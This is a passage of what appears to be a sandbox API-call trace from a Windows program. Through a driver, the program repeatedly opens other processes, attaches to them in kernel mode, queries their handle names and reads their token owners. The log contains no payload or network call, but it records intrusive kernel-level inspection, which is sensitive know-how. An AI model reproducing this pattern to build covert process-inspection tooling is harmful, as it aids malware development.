Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.952] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.952] PsReleaseProcessExitSynchronization () returned 0x2 [0245.952] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x12 [0245.952] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.952] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.952] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.952] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xc8 [0245.952] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.952] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002084b30, HandleInformation=0x0) returned 0x0 [0245.952] ObOpenObjectByPointer (in: Object=0xfffffa8002084b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.952] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x14 [0245.952] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.952] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.953] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.953] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.953] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.955] CloseHandle (hObject=0xc4) returned 1 [0245.955] CloseHandle (hObject=0xc8) returned 1 [0245.955] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.955] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.955] PsLookupProcessByProcessId (in: ProcessId=0x7fc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.955] PsAcquireProcessExitSynchronization () returned 0x0 [0245.955] KeStackAttachProcess (in: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880053c85d0) [0245.955] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800204c960, HandleInformation=0x0) returned 0x0 [0245.955] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.955] PsReleaseProcessExitSynchronization () returned 0x2 [0245.955] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x12 [0245.955] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.955] ObfDereferenceObject (Object=0xfffffa800204c960) returned 0x1 [0245.956] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.956] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.956] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.956] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0245.956] PsLookupProcessByProcessId (in: ProcessId=0x7fc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.956] PsAcquireProcessExitSynchronization () returned 0x0 [0245.956] KeStackAttachProcess (in: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880053c85d0) [0245.956] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002082400, HandleInformation=0x0) returned 0x0 [0245.956] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.956] PsReleaseProcessExitSynchronization () returned 0x2 [0245.956] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x12 [0245.956] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.956] ObfDereferenceObject (Object=0xfffffa8002082400) returned 0x1 [0245.956] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.956] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.956] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.956] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.956] PsLookupProcessByProcessId (in: ProcessId=0x7fc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.957] PsAcquireProcessExitSynchronization () returned 0x0 [0245.957] KeStackAttachProcess (in: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880053c85d0) [0245.957] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.957] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.957] PsReleaseProcessExitSynchronization () returned 0x2 [0245.957] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x12 [0245.957] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.957] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.957] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.957] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6c0) returned 0xc8 [0245.957] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.957] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800208e620, HandleInformation=0x0) returned 0x0 [0245.957] ObOpenObjectByPointer (in: Object=0xfffffa800208e620, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.957] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x14 [0245.957] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.958] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.958] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.958] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.958] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.960] CloseHandle (hObject=0xc4) returned 1 [0245.960] CloseHandle (hObject=0xc8) returned 1 [0245.960] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.960] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.960] PsLookupProcessByProcessId (in: ProcessId=0x6c0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.960] PsAcquireProcessExitSynchronization () returned 0x0 [0245.960] KeStackAttachProcess (in: PROCESS=0xfffffa800208e620, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800208e620, ApcState=0xfffff880053c85d0) [0245.960] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020948d0, HandleInformation=0x0) returned 0x0 [0245.960] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.960] PsReleaseProcessExitSynchronization () returned 0x2 [0245.960] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x12 [0245.961] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.961] ObfDereferenceObject (Object=0xfffffa80020948d0) returned 0x1 [0245.961] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.961] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.961] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.961] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0245.961] PsLookupProcessByProcessId (in: ProcessId=0x6c0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.961] PsAcquireProcessExitSynchronization () returned 0x0 [0245.961] KeStackAttachProcess (in: PROCESS=0xfffffa800208e620, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800208e620, ApcState=0xfffff880053c85d0) [0245.961] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002086800, HandleInformation=0x0) returned 0x0 [0245.961] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.961] PsReleaseProcessExitSynchronization () returned 0x2 [0245.961] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x12 [0245.961] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.962] ObfDereferenceObject (Object=0xfffffa8002086800) returned 0x1 [0245.962] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.962] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.962] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.962] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.962] PsLookupProcessByProcessId (in: ProcessId=0x6c0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.962] PsAcquireProcessExitSynchronization () returned 0x0 [0245.962] KeStackAttachProcess (in: PROCESS=0xfffffa800208e620, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800208e620, ApcState=0xfffff880053c85d0) [0245.962] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.962] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.962] PsReleaseProcessExitSynchronization () returned 0x2 [0245.962] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x12 [0245.962] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.962] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.963] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.963] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x348) returned 0xc8 [0245.963] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.963] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800209d060, HandleInformation=0x0) returned 0x0 [0245.963] ObOpenObjectByPointer (in: Object=0xfffffa800209d060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.963] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x14 [0245.963] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.963] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.963] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.963] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.963] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.994] CloseHandle (hObject=0xc4) returned 1 [0245.994] CloseHandle (hObject=0xc8) returned 1 [0245.994] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.994] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.994] PsLookupProcessByProcessId (in: ProcessId=0x348, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.994] PsAcquireProcessExitSynchronization () returned 0x0 [0245.994] KeStackAttachProcess (in: PROCESS=0xfffffa800209d060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800209d060, ApcState=0xfffff880053c85d0) [0245.994] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800209fa20, HandleInformation=0x0) returned 0x0 [0245.995] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.995] PsReleaseProcessExitSynchronization () returned 0x2 [0245.995] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x12 [0245.995] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.995] ObfDereferenceObject (Object=0xfffffa800209fa20) returned 0x1 [0245.995] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.995] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.995] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.995] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0245.995] PsLookupProcessByProcessId (in: ProcessId=0x348, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.995] PsAcquireProcessExitSynchronization () returned 0x0 [0245.995] KeStackAttachProcess (in: PROCESS=0xfffffa800209d060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800209d060, ApcState=0xfffff880053c85d0) [0245.995] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020a1e90, HandleInformation=0x0) returned 0x0 [0245.995] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.995] PsReleaseProcessExitSynchronization () returned 0x2 [0245.995] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x12 [0245.995] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.995] ObfDereferenceObject (Object=0xfffffa80020a1e90) returned 0x1 [0245.995] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.995] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.995] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.996] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.996] PsLookupProcessByProcessId (in: ProcessId=0x348, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.996] PsAcquireProcessExitSynchronization () returned 0x0 [0245.996] KeStackAttachProcess (in: PROCESS=0xfffffa800209d060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800209d060, ApcState=0xfffff880053c85d0) [0245.996] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.996] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.996] PsReleaseProcessExitSynchronization () returned 0x2 [0245.996] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x12 [0245.996] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.996] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.996] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.996] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xc8 [0245.996] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.996] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8003910240, HandleInformation=0x0) returned 0x0 [0245.996] ObOpenObjectByPointer (in: Object=0xfffffa8003910240, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0245.996] ObfDereferenceObject (Object=0xfffffa8003910240) returned 0x14 [0245.996] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0245.996] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0245.996] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.997] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.997] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.999] CloseHandle (hObject=0xc4) returned 1 [0245.999] CloseHandle (hObject=0xc8) returned 1 [0245.999] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.999] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.999] PsLookupProcessByProcessId (in: ProcessId=0x310, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.999] PsAcquireProcessExitSynchronization () returned 0x0 [0245.999] KeStackAttachProcess (in: PROCESS=0xfffffa8003910240, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003910240, ApcState=0xfffff880053c85d0) [0245.999] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020a1070, HandleInformation=0x0) returned 0x0 [0245.999] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.999] PsReleaseProcessExitSynchronization () returned 0x2 [0245.999] ObfDereferenceObject 